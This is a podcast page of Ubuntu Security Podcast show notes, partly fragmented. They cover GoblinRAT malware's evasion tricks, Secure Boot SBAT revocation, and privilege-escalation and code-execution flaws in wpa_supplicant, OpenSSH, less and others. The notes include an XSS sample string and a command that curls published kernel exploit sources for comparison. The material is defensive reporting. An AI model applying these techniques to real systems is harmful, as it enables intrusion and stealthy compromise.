242 avsnitt • Längd: 20 min • Månadsvis
A fortnightly podcast talking about the latest developments and updates from the Ubuntu Security team, including a summary of recent security vulnerabilities and fixes as well as a discussion on some of the goings on in the wider Ubuntu Security community.
The podcast Ubuntu Security Podcast is created by Ubuntu Security Team. The podcast and the artwork on this page are embedded on this page using the public podcast feed (RSS).
This week we take a deep dive into the latest Linux malware, GoblinRAT to look at how malware is evolving to stay stealthy and evade detection and how malware authors are learning from modern software development along the way.
Solar 4RAYS team (Cyber Threat Research Center at SOLAR - Russian Cybersecurity firm) describes a new piece of Linux malware which they name GoblinRAT (RAT = Remote Access Trojan) 2023 when contacted by an IT company which provides services to (presumably) Russian government agencies - noticed system logs being deleted off one of their servers and a utility being downloaded to steal account passwords from a domain controller
Found this malware masquerading as a legitimate process which takes quite careful steps to avoid detection - in fact most of the functionality within the malware is devoted to hiding its presence on the target system
Doesn’t include automatic persistence but instead appears to be manually “installed” by the attackers with a unique name for each target where it would be named after an existing legitimate process on the target system - similarly even the names of its files and libraries were also unique per-system as well to avoid detection
zabbix_agent
and setup a new systemd service to launch itself at boot
which looks identical to the real zabbix agent (except the real one is
zabbix_agentd
) and then once running it edits its own command-line
arguments after startup to insert standard parameters expected by the real
zabbix_agentd
so that on a ps aux
or similar output it appears basically
identical to the real zabbix_agentd
rhsmd
to mimic the Red Hat subscription
manager service again using systemd as the launcher, whilst for others as
memcached
using cron to launchchrony_debug
to
mimic the chronyd
time synchronisation service, it would connect to C2 a
machine named chronyd.tftpd.net
- attackers clearly went to a lot of work
to hide this in plain sightAutomatically deletes itself off the system if does not get pinged by the C2 operator after a certain period of time - and when it deletes itself it shreds itself to reduce the chance of being detected later via disk forensics etc
Has 2 versions - a “server” and “client” - the server uses port-knocking to watching incoming connection requests on a given network interface and then only actually allowing a connection if the expected sequence of port numbers was tried - this allows the controller of the malware to connect into it without the malware actively listening on a given port and hence reduces the chance it is detected accidentally
Client instead connects back to its specific C2 server
Logs collected by 4RAYS team appear to show the commands executed by the malware were quite manual looking - invoking bash and then later invoking commands like systemctl to stop and replace an existing service, where the time lag between commands is in the order of seconds - minutes and so would seem like these were manually typed command rather than automatically driven by scripts
Malware itself is implemented in Go and includes the ability to execute single commands as well as providing an interactive shell; also includes support for listing / copying / moving files including with compression; also works as a SOCKS5 proxy to allow it to proxy traffic to/from other hosts that may be behind more restrictive firewalls etc; and as detailed above the ability to mimic existing processes on the system to avoid detection
To try and frustrate reverse engineering Gobfuscate was used to obfuscate the compiled code - odd choice though since this project was seemingly abandonded 3 years ago and nowadays garble seems to be the go-to tool for this (no pun intended)- but perhaps this is evidence of the time of the campaign since these samples were all found back in 2020 which this project was more active…
Encrypts its configuration using AES-GCM and the config contains details like the shell to invoke, kill-switch delay and secret value to use to disable it, alternate process name to use plus the TLS certificate and keys to use when communicating with the C2 server
Uses the yamux Go connection multiplexing library then to multiplex the single TLS connection to/from the C2 server
Can then be instructed to perform the various actions like running commands / launching a shell / list files in a directory / reading files etc as discussed before
Other interesting part is the kill switch / self-destruct functionality - if kill switch delay is specified in the encrypted configuration malware will automatically delete itself by invoking dd to overwrite itself with input from /dev/urandom 8 times; once more with 0 bytes and finally then removing the file from disk
Overall 4 organisations were found to have been hacked with this and in each it was running with full admin rights - with some running for over 3 years - and various binaries show compilation dates and golang toolchain versions indicating this was developed since at least 2020
But unlike other malware that we have covered, it does not appear to be a more widespread campaign since “other information security companies with global sensor networks” couldn’t find any similar samples in their own collections
No clear evidence of origin - Solar 4RAYS asking for other cybersecurity companies to help contribute to their evidence to identify the attackers
Interesting to see the evolution of malware mirrors that of normal software development - no longer using C/C++ etc but more modern languages like Go which provide exactly the sorts of functionality you want in your malware - systems-level programming functionality with built-in concurrency and memory safety - also Go binaries are statically linked so no need to worry about dependencies on the target system
For the third and final part in our series for Cybersecurity Awareness Month, Alex is again joined by Luci as well as Diogo Sousa to discuss future trends in cybersecurity and the likely threats of the future.
In the second part of our series for Cybersecurity Awareness Month, Luci is back with Alex, along with Eduardo Barretto to discuss our top cybersecurity best practices.
For the first in a 3-part series for Cybersecurity Awareness month, Luci Stanescu joins Alex to discuss the recent CUPS vulnerabilities as well as the evolution of cybersecurity since the origin of the internet.
John and Maximé have been talking about Ubuntu’s AppArmor user namespace restrictions at the the Linux Security Summit in Europe this past week, plus we cover some more details from the official announcement of permission prompting in Ubuntu 24.10, a new release of Intel TDX for Ubuntu 24.04 LTS and more.
613 unique CVEs addressed in the past fortnight
The long awaited preview of snapd-based AppArmor file prompting is finally seeing the light of day, plus we cover the recent 24.04.1 LTS release and the podcast officially moves to a fortnightly cycle.
45 unique CVEs addressed
home
interface in snapd get tagged with a prompt attribute - any access then which
would normally be allowed is instead delegated to a trusted helper application
which displays a dialog to the user asking them to explicitly allow such
access
seccomp_unotify
interface - allows to
delegate seccomp decisions to userspace in a very similar manner - existed
since the 5.5 kernel released in January 2020desktop-security-center
snap as well as the prompting-client
snapA recent Microsoft Windows update breaks Linux dual-boot - or does it? This week we look into reports of the recent Windows patch-Tuesday update breaking dual-boot, including a deep-dive into the technical details of Secure Boot, SBAT, grub, shim and more, plus we look at a vulnerability in GNOME Shell and the handling of captive portals as well.
135 unique CVEs addressed
grub,1
grub,2
, ie sets the minimum generation number
for grub to 3
mokutil --list-sbat-revocations
cat /sys/firmware/efi/efivars/SbatLevelRT-605dab50-e046-4300-abb6-3dd810dd8b23
mokutil --list-sbat-revocations
sbat,1,2023012900
shim,2
grub,3
grub.debian,4
objdump -j .sbat -s /boot/efi/EFI/ubuntu/grubx64.efi | xxd -r
sbat,1,SBAT Version,sbat,1,https://github.com/rhboot/shim/blob/main/SBAT.md
grub,4,Free Software Foundation,grub,2.12,https://www.gnu.org/software/grub/
grub.ubuntu,2,Ubuntu,grub2,2.12-5ubuntu4,https://www.ubuntu.com/
grub.peimage,2,Canonical,grub2,2.12-5ubuntu4,https://salsa.debian.org/grub-team/grub/-/blob/master/debian/patches/secure-boot/efi-use-peimage-shim.patch
rm -rf grub2-signed
mkdir grub2-signed
pushd grub2-signed >/dev/null || exit
for rel in focal jammy noble; do
mkdir $rel
pushd $rel >/dev/null || exit
pull-lp-debs grub2-signed $rel-security 1>/dev/null 2>/dev/null || pull-lp-debs grub2-signed $rel-release 1>/dev/null 2>/dev/null
dpkg-deb -x grub-efi-amd64-signed*.deb grub2-signed
echo $rel
echo -----
find . -name grubx64.efi.signed -exec objdump -j .sbat -s {} \; | tail -n +5 | xxd -r
popd >/dev/null || exit
done
popd >/dev/null
focal
-----
sbat,1,SBAT Version,sbat,1,https://github.com/rhboot/shim/blob/main/SBAT.md
grub,4,Free Software Foundation,grub,2.06,https://www.gnu.org/software/grub/
grub.ubuntu,1,Ubuntu,grub2,2.06-2ubuntu14.4,https://www.ubuntu.com/
jammy
-----
sbat,1,SBAT Version,sbat,1,https://github.com/rhboot/shim/blob/main/SBAT.md
grub,4,Free Software Foundation,grub,2.06,https://www.gnu.org/software/grub/
grub.ubuntu,1,Ubuntu,grub2,2.06-2ubuntu14.4,https://www.ubuntu.com/
noble
-----
sbat,1,SBAT Version,sbat,1,https://github.com/rhboot/shim/blob/main/SBAT.md
grub,4,Free Software Foundation,grub,2.12,https://www.gnu.org/software/grub/
grub.ubuntu,2,Ubuntu,grub2,2.12-1ubuntu7,https://www.ubuntu.com/
grub.peimage,2,Canonical,grub2,2.12-1ubuntu7,https://salsa.debian.org/grub-team/grub/-/blob/master/debian/patches/secure-boot/efi-use-peimage-shim.patch
rm -rf shim-signed
mkdir shim-signed
pushd shim-signed >/dev/null || exit
for rel in focal jammy noble; do
mkdir $rel
pushd $rel >/dev/null || exit
pull-lp-debs shim-signed $rel-security 1>/dev/null 2>/dev/null || pull-lp-debs shim-signed $rel-release 1>/dev/null 2>/dev/null
dpkg-deb -x shim-signed*.deb shim-signed
echo $rel
echo -----
find . -name shimx64.efi.signed.latest -exec objdump -j .sbat -s {} \; | tail -n +5 | xxd -r
popd >/dev/null || exit
done
popd >/dev/null
focal
-----
sbat,1,SBAT Version,sbat,1,https://github.com/rhboot/shim/blob/main/SBAT.md
shim,3,UEFI shim,shim,1,https://github.com/rhboot/shim
shim.ubuntu,1,Ubuntu,shim,15.7-0ubuntu1,https://www.ubuntu.com/
jammy
-----
sbat,1,SBAT Version,sbat,1,https://github.com/rhboot/shim/blob/main/SBAT.md
shim,3,UEFI shim,shim,1,https://github.com/rhboot/shim
shim.ubuntu,1,Ubuntu,shim,15.7-0ubuntu1,https://www.ubuntu.com/
noble
-----
sbat,1,SBAT Version,sbat,1,https://github.com/rhboot/shim/blob/main/SBAT.md
shim,4,UEFI shim,shim,1,https://github.com/rhboot/shim
shim.ubuntu,1,Ubuntu,shim,15.8-0ubuntu1,https://www.ubuntu.com/
only noble has a new-enough shim in the security/release pocket - both focal and jammy have the older one - but the new 4th generation shim is currently undergoing testing in the -proposed pocket and will be released next week
until then, if affected, need to disable secure boot in BIOS then can either wait until the new shim is released OR just reboot twice in this mode and shim will automoatically reset the SBAT policy to the previous version, allowing the older shim to still be used
then can re-enable Secure Boot in BIOS
Once new shim is released it will reinstall the new SBAT policy to revoke its older version
One other thing, this also means the old ISOs won’t boot either
This week we take a deep dive behind-the-scenes look into how the team handled a
recent report from Snyk’s Security Lab of a local privilege escalation
vulnerability in wpa_supplicant
plus we cover security updates in Prometheus
Alertmanager, OpenSSL, Exim, snapd, Gross, curl and more.
185 unique CVEs addressed
SSL_free_buffers
API - requires an application to directly
call this function - across the entire Ubuntu package ecosystem there
doesn’t appear to be any packages that do this so highly unlikely to be an
issue in practiceSSL_select_next_proto
- if called
with an empty buffer list would read other private memory - ie OOB read -
and potentially then either crash or return private data
SSL_OP_NO_TICKET
option would possibly get into a state where
the session cache would not be flushed and so would grow unbounded - memory
based DoS/usr/share/applications
which is
world-readable - so if the symlink pointed to /etc/shadow
then you would get
a copy of this written out as world-readable - so an unprivileged user on
the system could then possibly escalate their privilegesstrncat()
during logging
wpa_supplicant
to load an attacker controlled shared object into memorywpa_supplicant
(16:10)wpa_supplicant
to allow various methods to be called by users in the netdev
group
wpa_supplicant
via its dbus interfaceCreateInterface
ConfigFile
which specifies the path to a configuration file using the format of wpa_supplicant.confopensc_engine_path
or similarly PKCS11 engine and module pathswpa_supplicant
wpa_supplicant
runs as rootwpa_supplicant
DBus interface - none appear to make use of the netdev
groupwpa_supplicant
to check that the specified module was
owned by root - this should then stop an unprivileged user from creating
their own module and specifying it as it wouldn’t be owned by root
root
link inside the
proc filesystem - which points to the actual root directory of that
process - and since the FUSE fs lies about the UID it looks like root
ownedrealpath
works
(which should block the ability to read it via the proc symlink)
/usr/lib
- since
anything installed from the archive would live here - in this case we simply
call realpath()
directly on the provided path name and if it doesn’t start
with /usr/lib then deny loading of the module/opt
would now fail BUT if you
can write to /opt
then you can write to somewhere in /usr/lib
- so is easy
to fix as wellThis week we take a look at the recent Crowdstrike outage and what we can learn from it compared to the testing and release process for security updates in Ubuntu, plus we cover details of vulnerabilities in poppler, phpCAS, EDK II, Python, OpenJDK and one package with over 300 CVE fixes in a single update.
462 unique CVEs addressed
This week we deep-dive into one of the best vulnerabilities we’ve seen in a long time regreSSHion - an unauthenticated, remote, root code-execution vulnerability in OpenSSH. Plus we cover updates for Plasma Workspace, Ruby, Netplan, FontForge, OpenVPN and a whole lot more.
39 unique CVEs addressed
user@host:port
combination - so would possibly then use a different hostname than the one the
user expectedungetbyte()/ungetc()
to push-back characters on an IO
stream - would possibly read beyond the end of the buffer - OOB readsystem()
system-call - which spawns a shell -
so if a filename contained any shell metacharacters, could then just easily
get arbitrary code executionmalloc()/free()
syslog()
when trying to which is one of those unsafe functions
syslog()
will potentially call malloc()/free()
which as we
mentioned earlier is not async safe
malloc() / free()
and then SIGALARM
signal is delivered (since
malloc()/free()
calls brk (2) system call under the hood and so a
pending signal SIGALARM
may be delivered on return from brk()
)malloc()
at the same time - corrupting the global state of the heap
etcsyslog()
during the SIGALARM
signal handlersyslog()
within OpenSSH so that syslog()
gets
called early on in the use of OpenSSH and so then when it gets called in the
SIGALARM signal handler it doesn’t do the same memory allocation and hence
can’t be used to corrupt memory and get code executionA look into CISA’s Known Exploited Vulnerability Catalogue is on our minds this week, plus we look at vulnerability updates for gdb, Ansible, CUPS, libheif, Roundcube, the Linux kernel and more.
175 unique CVEs addressed
tower_callback
(nowadays is called aap_callback
-
Ansible Automation Platform) parameter appropriatelyunsafe
- in that they may come from an external,
untrusted source - won’t get evaluated/expanded when used to avoid possible
info leaks etc - various issues where ansible would fail to respect this and
essentially forget they were tagged as unsafe and end up exposing secrets as a
resultFoomaticRIPCommandLine
then can run arbitrary commands
as rootAF_PACKET
, tty, ptrace, futex and
othersThis week we bring you a special edition of the podcast, featuring an interview between Ijlal Loutfi and Karen Horovitz who deep-dive into Confidential Computing. Ranging from a high-level discussion of the need for and the features provided by confidential computing, through to the specifics of how this is implemented in Ubuntu and a look at similar future security technologies that are on the horizon.
As the podcast winds down for a break over the next month, this week we talk about RSA timing side-channel attacks and the recently announced DNSBomb vulnerability as we cover security updates in VLC, OpenSSL, Netatalk, WebKitGTK, amavisd-new, Unbound, Intel Microcode and more.
152 unique CVEs addressed
The team is back from Madrid and this week we bring you some of our plans for the upcoming Ubuntu 24.10 release, plus we talk about Google’s kernelCTF project and Mozilla’s PDF.js sandbox when covering security updates for the Linux kernel, Firefox, Spreadsheet::ParseExcel, idna and more.
121 unique CVEs addressed
io_uring
or
nftables
since they were disabled in their target kernel configuration due to
high number of historical vulns in both subsystems
eval()
on untrusted user input - high profile,
disclosed by Mandiant - high profile since it affected Barracuda email gateway
devices and was publicly reported as being exploited against these by a
Chinese APT groupUbuntu 24.04 LTS is finally released and we cover all the new security features it brings, plus we look at security vulnerabilities in, and updates for, FreeRDP, Zabbix, CryptoJS, cpio, less, JSON5 and a heap more.
61 unique CVEs addressed
--no-absolute-filenames
CLI argumentLESSOPEN
environment variable - failed
to properly quote newlines embedded in a filename - could then allow for
arbitrary code execution if ran less
on some untrusted fileLESSOPEN
is automatically set in Debian/Ubuntu via lesspipe
- allows to run
less on say a gz compressed log file or even on a tar.gz tarball to list the
files etc__Host-
and __Secure-
) have specific
meanings which in general should be allowed to be specified by the network but
only by the browser itself - so can be used to bypass usual restrictions
(apparently this issue was reported upstream by the original reported of the
2022 vuln but it got ignored by upstream till now…)password_verify()
function would sometimes return true for wrong passwords -
ie if the actual password started with a NUL byte and the specified a password
was the empty string would verify as true (unlikely to be an issue in practice)PHP_CLI_SERVER_WORKERS
env var value -
integer overflow -> wraparound -> allocate small amount of memory for a large
number of values -> buffer overflow (low priority since would need to be able
to set this env var first)__proto__
key and hence would allow the ability to set arbitrary keys etc
within the returned object -> RCEKernel type | 22.04 | 20.04 | 18.04 |
---|---|---|---|
aws | 103.3 | 103.3 | — |
aws-5.15 | — | 103.3 | — |
aws-5.4 | — | — | 103.3 |
aws-6.5 | 103.1 | — | — |
azure | 103.3 | 103.3 | — |
azure-5.4 | — | — | 103.3 |
azure-6.5 | 103.1 | — | — |
gcp | 103.3 | 103.3 | — |
gcp-5.15 | — | 103.3 | — |
gcp-5.4 | — | — | 103.3 |
gcp-6.5 | 103.1 | — | — |
generic-5.15 | — | 103.3 | — |
generic-5.4 | — | 103.3 | 103.3 |
gke | 103.3 | 103.3 | — |
hwe-6.5 | 103.1 | — | — |
ibm | 103.3 | — | — |
ibm-5.15 | — | 103.3 | — |
linux | 103.3 | — | — |
lowlatency-5.15 | — | 103.3 | — |
lowlatency-5.4 | — | 103.3 | 103.3 |
canonical-livepatch status
John and Georgia are at the Linux Security Summit presenting on some long awaited developments in AppArmor and we give you all the details in a sneak peek preview as well as some of the other talks to look out for, plus we cover security updates for NSS, Squid, Apache, libvirt and more and we put out a call for testing of a pending AppArmor security fix too.
86 unique CVEs addressed
g_new0()
from
glib which expects an unsigned value -> tries to allocate an extremely large
amount of memory -> crashpledge()
and unveil()
from OpenBSD
kill
along with the associated signal to deliverpledge()
This week we cover the recent reports of a new local privilege escalation exploit against the Linux kernel, follow-up on the xz-utils backdoor from last week and it’s the beta release of Ubuntu 24.04 LTS - plus we talk security vulnerabilities in the X Server, Django, util-linux and more.
76 unique CVEs addressed
Kernel type | 22.04 | 20.04 | 18.04 | 16.04 | 14.04 |
---|---|---|---|---|---|
aws | 102.1 | 102.1 | 102.1 | 102.1 | — |
aws-5.15 | — | 102.1 | — | — | — |
aws-5.4 | — | — | 102.1 | — | — |
aws-6.5 | 102.1 | — | — | — | — |
aws-hwe | — | — | — | 102.1 | — |
azure | 102.1 | 102.1 | — | 102.1 | — |
azure-4.15 | — | — | 102.1 | — | — |
azure-5.4 | — | — | 102.1 | — | — |
azure-6.5 | 102.1 | — | — | — | — |
gcp | 102.1 | 102.1 | — | 102.1 | — |
gcp-4.15 | — | — | 102.1 | — | — |
gcp-5.15 | — | 102.1 | — | — | — |
gcp-5.4 | — | — | 102.1 | — | — |
gcp-6.5 | 102.1 | — | — | — | — |
generic-4.15 | — | — | 102.1 | 102.1 | — |
generic-4.4 | — | — | — | 102.1 | 102.1 |
generic-5.15 | — | 102.1 | — | — | — |
generic-5.4 | — | 102.1 | 102.1 | — | — |
gke | 102.1 | 102.1 | — | — | — |
gke-5.15 | — | 102.1 | — | — | — |
gkeop | — | 102.1 | — | — | — |
hwe-6.5 | 102.1 | — | — | — | — |
ibm | 102.1 | 102.1 | — | — | — |
ibm-5.15 | — | 102.1 | — | — | — |
linux | 102.1 | — | — | — | — |
lowlatency | 102.1 | — | — | — | — |
lowlatency-4.15 | — | — | 102.1 | 102.1 | — |
lowlatency-4.4 | — | — | — | 102.1 | 102.1 |
lowlatency-5.15 | — | 102.1 | — | — | — |
lowlatency-5.4 | — | 102.1 | 102.1 | — | — |
canonical-livepatch status
CAP_SYS_ADMIN
) - but then
firefox correctly detects this and falls back to the correct behaviourn_gsm
driver in the 6.4 and and 6.5 kernelsjmpeax
(Jammes) - who wanted to purchase the exploitdiff -w <(curl https://raw.githubusercontent.com/jmpe4x/GSM_Linux_Kernel_LPE_Nday_Exploit/main/main.c) <(curl https://raw.githubusercontent.com/YuriiCrimson/ExploitGSM/main/ExploitGSM_6_5/main.c)
n_gsm
/sys/kernel/notes
which leaks the symbol of the xen_startup
function and
allows to break KASLR
The executable payloads were embedded as binary blobs in the test files. This was a blatant violation of the Debian Free Software Guidelines.
On machines that see lots bots poking at the SSH port, the backdoor noticeably increased CPU load, resulting in degraded user experience and thus overwhelmingly negative user feedback.
The maintainer who added the backdoor has disappeared.
Backdoors are bad for security.
It’s been an absolutely manic week in the Linux security community as the news and reaction to the recent announcement of a backdoor in the xz-utils project was announced late last week, so we dive deep into this issue and discuss how it impacts Ubuntu and give some insights for what this means for the open source and Linux communities in the future.
20 unique CVEs addressed
strings
on it and get any real sensible output)This week we bring you a sneak peak of how Ubuntu 23.10 fared at Pwn2Own Vancouver 2024, plus news of malicious themes in the KDE Store and we cover security updates for the Linux kernel, X.Org X Server, TeX Live, Expat, Bash and more.
61 unique CVEs addressed
We cover recent Linux malware from the Magnet Goblin threat actor, plus the news of Ubuntu 23.10 as a target in Pwn2Own Vancouver 2024 and we detail vulnerabilities in Puma, AccountsService, Open vSwitch, OVN, and more.
102 unique CVEs addressed
Kernel type | 22.04 | 20.04 | 18.04 | 16.04 | 14.04 |
---|---|---|---|---|---|
aws | 101.1 | 101.1 | 101.1 | 101.1 | — |
aws-5.15 | — | 101.1 | — | — | — |
aws-5.4 | — | — | 101.1 | — | — |
aws-6.5 | 101.1 | — | — | — | — |
aws-hwe | — | — | — | 101.1 | — |
azure | 101.1 | 101.1 | — | 101.1 | — |
azure-4.15 | — | — | 101.1 | — | — |
azure-5.4 | — | — | 101.1 | — | — |
azure-6.5 | 101.1 | — | — | — | — |
gcp | 101.1 | 101.1 | — | 101.1 | — |
gcp-4.15 | — | — | 101.1 | — | — |
gcp-5.15 | — | 101.1 | — | — | — |
gcp-5.4 | — | — | 101.1 | — | — |
gcp-6.5 | 101.1 | — | — | — | — |
generic-4.15 | — | — | 101.1 | 101.1 | — |
generic-4.4 | — | — | — | 101.1 | 101.1 |
generic-5.15 | — | 101.2 | — | — | — |
generic-5.4 | — | 101.1 | 101.1 | — | — |
gke | 101.1 | — | — | — | — |
gke-5.15 | — | 101.1 | — | — | — |
gkeop | — | 101.1 | — | — | — |
hwe-6.5 | 101.1 | — | — | — | — |
ibm | 101.1 | 101.1 | — | — | — |
ibm-5.15 | — | 101.1 | — | — | — |
linux | 101.2 | — | — | — | — |
lowlatency-4.15 | — | — | 101.1 | 101.1 | — |
lowlatency-4.4 | — | — | — | 101.1 | 101.1 |
lowlatency-5.15 | — | 101.2 | — | — | — |
lowlatency-5.4 | — | 101.1 | 101.1 | — | — |
To check your kernel type and Livepatch version, enter this command:
canonical-livepatch status
/proc/<pid>/cmdline
- very low risk since the
process only exists for a very small time AND it is encrypted already - so
instead now invokes chpasswd
and specifies the new encrypted password over
standard input - would then need to be able to ptrace to see it which with
YAMA ptrace_scope
enabled in Ubuntu means you need to be root (or a parent
process of accountsservice, which is started by dbus for the current user) -
so then an attacker would have to be able to cause the existing accountservice
to stop and then start their own to see the new encrypted password/dashboard/
endpoint - likely to try and hide its network traffic in plain-sight (rather
than the raw TCP sockets with custom encrypted protocol employed by
NerbianRAT)Andrei is back to discuss recent academic research into malware within the Python/PyPI ecosystem and whether it is possible to effectively combat it with open source tooling, plus we cover security updates for Unbound, libuv, node.js, the Linux kernel, libgit2 and more.
56 unique CVEs addressed
getaddrinfo()
- but
would then fail to NUL-terminate the string - as such, getaddrinfo()
would
read past the end of the buffer and the address that got resolved may not be
the intended one - so then a remote attacker who could influence this could
end up causing the application to contact a different address than expected
and so perhaps access internal services etc<<<<<<....
then would cause exponential performance
degredationsend()
rather than public_send()
which allowed access to
private methods to directly execute system calls@
git_index_add
/erc/resolv.conf
/etc/hosts
, /etc/nsswitch.conf
or anything specifed via the
HOSTALIASES
environment variable - if has an embedded NUL as the first
character in a new line, would then attempt to read memory prior to the start
of the buffer and hence an OOB read -> crashHey, Alex!
We will continue our journey today beyond the scope of the previous episodes. We’ve delved into the realms of network security, federated infrastructures, and vulnerability detection and assessment.
Last year, the Ubuntu Security Team participated in the Linux Security Summit in Bilbao. At that time, I managed to have a discussion with Zach, who hosted a presentation at the Supply Chain Security Con entitled “Will Large-Scale Automated Scanning Stop Malware on OSS Repositories?”. I later discovered that his talk was backed by a paper that he and his colleagues from Chainguard had published.
With this in mind, today we will be examining “Bad Snakes: Understanding and Improving Python Package Index Malware Scanning”, which was published last year in ACM’s International Conference on Software Engineering.
The aim of the paper is to highlight the current state of the Python and PyPi ecosystems from a malware detection standpoint, identify the requirements for a mature malware scanner that can be integrated into PyPi, and ascertain whether the existing open-source tools meet these objectives.
With this in mind, let’s start by understanding the context.
Applications can be distributed through repositories. This means that the applications are packaged into a generic format and published in either managed or unmanaged repositories. Users can then install the application by querying the repositories, downloading the application in a format that they can unpack through a client, and subsequently run on their hosts.
There are numerous repositories out there. Some target specific operating systems, as is the case with Debian repositories, the Snap Store, Google Play, or the Microsoft Store. Others are designed to store packages for a specific programming language, such as PyPi, npm, and RubyGems. Firefox Add-ons and the Chrome extension store target a specific platform, namely the browser.
Another relevant characteristic when discussing repositories is the level of curation. The Ubuntu Archive is considered a curated repository of software packages because there are several trustworthy contributors able to publish software within the repository. Conversely, npm is unmanaged because any member of the open-source community can publish anything in it.
We will discuss the Python Package Index extensively, which is the de facto unmanaged repository for the Python programming language. As of the 7th of March 2024, there were 5.4 million releases for 520 thousand projects and nearly 800 thousand users. It is governed by a non-profit organisation and run by volunteers worldwide.
Software repositories foster the dependencies of software on other pieces of software, controlled by different parties. As seen in campaigns such as the SolarWinds SUNBURST attack, this can go awry. Attackers can gain control over software in a company’s supply chain, gain initial access to their infrastructure, and exploit this advantage.
Multiple attack vectors are possible. Accounts can be hijacked. Attackers may publish packages with similar names (in a tactic known as typosquatting). They can also leverage shrink-wrapped clones, which are duplicates of existing packages, where malicious code is injected after gaining users’ trust. While covering all attack vectors is beyond the scope of this podcast episode, you can find a comprehensive taxonomy in a paper called “Taxonomy of Attacks on Open-Source Software Supply Chains”, which lists over 100 unique attack vectors.
From 2017 to 2022, the number of unique projects removed from PyPi increased rapidly: 38 in the first year, followed by 130, 60, 500, 27 thousands, and finally 12 thousands in the last year. Despite the fact that most of these were reported as malware, it’s worth noting that the impact of some of them is limited due to the lack of organic usage.
These attacks can be mitigated by implementing techniques such as multi-factor authentication, software signing, update frameworks, or reproducible builds, but the most widespread method is malware analysis.
Some engines check for anomalies via static and dynamic heuristics, while others rely on signatures due to their simplicity. Once a piece of software is detected as malicious, its hash is added to a deny list that is embedded in the anti-malware engine. Each file is then hashed and the result is checked against the deny list. If the heuristics or the hash comparison identifies the file as malicious, it is either reported, blocked, or deleted depending on the strategy implemented by the anti-malware engine.
These solutions are already implemented in software repositories. In the case of PyPi, malware scanning was introduced in February 2022 with the assistance of a malware check feature in Warehouse, the application serving PyPi. However, it was disabled by the administrators two years later and ultimately removed in May 2023 due to an overload of alerts.
In addition to this technical solution, PyPi also capitalises on a form of social symbiosis. Software security companies and individuals conduct security research, reporting any discovered malware to the PyPi administrators via email. The administrators typically allocate 20 minutes per week to review these malware reports and remove any packages that can be verified as true positives. Ultimately, the reporting companies and individuals gain reputation or attention for their brands, products, and services.
In addition to information about software repositories, supply chain attacks, malware analysis, and PyPi, the researchers also interviewed administrators from PyPi to understand their requirements for a malware analysis tool that could assist them. The three interviews, each lasting one hour, were conducted in July and August 2022 and involved only three individuals. This limited number of interviews is due to the focus on the PyPi ecosystem, where only ten people are directly involved in malware scanning activities.
When discussing requirements, the administrators desired tools with a binary outcome, which could be determined by checking if a numerical score exceeds a threshold or not. The decision should also be supported by arguments. While administrators can tolerate false negatives, they aim to reduce the rate of false positives to zero. The tool should also operate on limited resources and be easy to adopt, use and maintain.
But do the current solutions tick these boxes?
The researchers selected tools based on a set of criteria: analysing the code of the packages, having public detection techniques, and detection rules. Upon examining the available solutions, they found that only three could be used for evaluation in the context of their research: PyPi’s malware checks, Bandit4Mal, and OSSGadget’s OSS Detect Backdoor.
Regarding the former, it should be noted that the researchers did not match the YARA rules only against the setup files, but also against all files in the Python package. The second, Bandit4Mal, is an open-source version of Bandit that has been adapted to include multiple rules for detecting malicious patterns in the AST generated from a program’s codebase. The last, OSSGadget’s OSS Detect Backdoor, is a tool developed by Microsoft in June 2020 to perform rule-based malware detection on each file in a package.
These tools were tested against both malicious and benign Python packages. The researchers used two datasets containing 168 manually-selected malicious packages. For the benign packages, they selected 1,400 popular packages and one thousand randomly-selected benign Python packages.
For the evaluation process, they considered an alert in a malicious package to be a true positive and an alert in a benign package to be a false positive.
The true positive rate was 85% for the PyPi checks, the same for OSS Detect Backdoor and 90% for Bandit4Mal. The false positive rates ranged from 15% for the PyPi checks over the random packages, to 80% for Bandit4Mal on popular packages.
The tools ran in a time-effective manner, with a median time of around two seconds per package across all datasets. The maximum runtime was recorded for Ansible’s package, which was scanned in 26 minutes.
Despite their efficient run times, we can infer from these results that the tools are not accurate enough to meet the demands of PyPi’s administrators. The analysts may be overwhelmed by alerts for benign packages, which could interfere with their other operations.
And with this, we can conclude the episode of the Ubuntu Security Podcast, which details the paper “Bad Snakes: Understanding and Improving Python Package Index Malware Scanning”. We have discussed software repositories, malware analysis, and malware-related operations within PyPi. We’ve also explored the requirements that would make a new open-source Python malware scanner suitable for the PyPi administrators and evaluated how the current solutions perform.
If you come across any interesting topics that you believe should be discussed, please email us at [email protected].
Over to you, Alex!
The Linux kernel.org CNA has assigned their first CVEs so we revisit this topic to assess the initial impact on Ubuntu and the CVE ecosystem, plus we cover security updates for Roundcube Webmail, less, GNU binutils and the Linux kernel itself.
64 unique CVEs addressed
/etc/modprobe.d/blacklist-rare-network.conf
# appletalk
alias net-pf-5 off
[1]
and linkify them to the
source - if an attacker used a form like [<script>evil</script>]
this would be
included in the generated HTML without escaping and so could get arbitrary XSSREFRESH MATERIALIZED VIEW CONCURRENTLY
commands - should drop privileges so that the SQL is executed as
the owner of the materialized view - as such, if an attacker could get a user
or automated system to run such a command they could possibly execute
arbitrary SQL as the user rather than as the owner of the view as expectedLESSCLOSE
- could then get arbitrary
shell commands - env var that tells less to invoke a particular command as an
input post-processor (this is used in conjunction with LESSOPEN
to
pre-processor the file before it is displayed by less - for instance, if you
wanted to use less to page through a HTML file you might perhaps use this to
run it via html2text
first - then use LESSCLOSE
to do any cleanup)CVE-2023-52433: netfilter: nft_set_rbtree: skip sync GC for new elements in this transaction
Fri 01 Mar 2024 04:04:26 UTC
have assigned 288 CVEs
This week the Linux kernel project announced they will be assigning their own CVEs so we discuss the possible implications and fallout from such a shift, plus we cover vulnerabilities in the kernel, Glance_store, WebKitGTK, Bind and more.
64 unique CVEs addressed
Kernel type | 22.04 | 20.04 | 18.04 | 16.04 | 14.04 |
---|---|---|---|---|---|
aws | 100.1 | 100.1 | 100.1 | 100.1 | — |
aws-5.15 | — | 100.1 | — | — | — |
aws-5.4 | — | — | 100.1 | — | — |
aws-6.2 | 100.1 | — | — | — | — |
aws-hwe | — | — | — | 100.1 | — |
azure | 100.1 | 100.1 | — | 100.1 | — |
azure-4.15 | — | — | 100.1 | — | — |
azure-5.4 | — | — | 100.1 | — | — |
azure-6.2 | 100.1 | — | — | — | — |
gcp | 100.1 | 100.1 | — | 100.1 | — |
gcp-4.15 | — | — | 100.1 | — | — |
gcp-5.15 | — | 100.1 | — | — | — |
gcp-5.4 | — | — | 100.1 | — | — |
gcp-6.2 | 100.1 | — | — | — | — |
generic-4.15 | — | — | 100.1 | 100.1 | — |
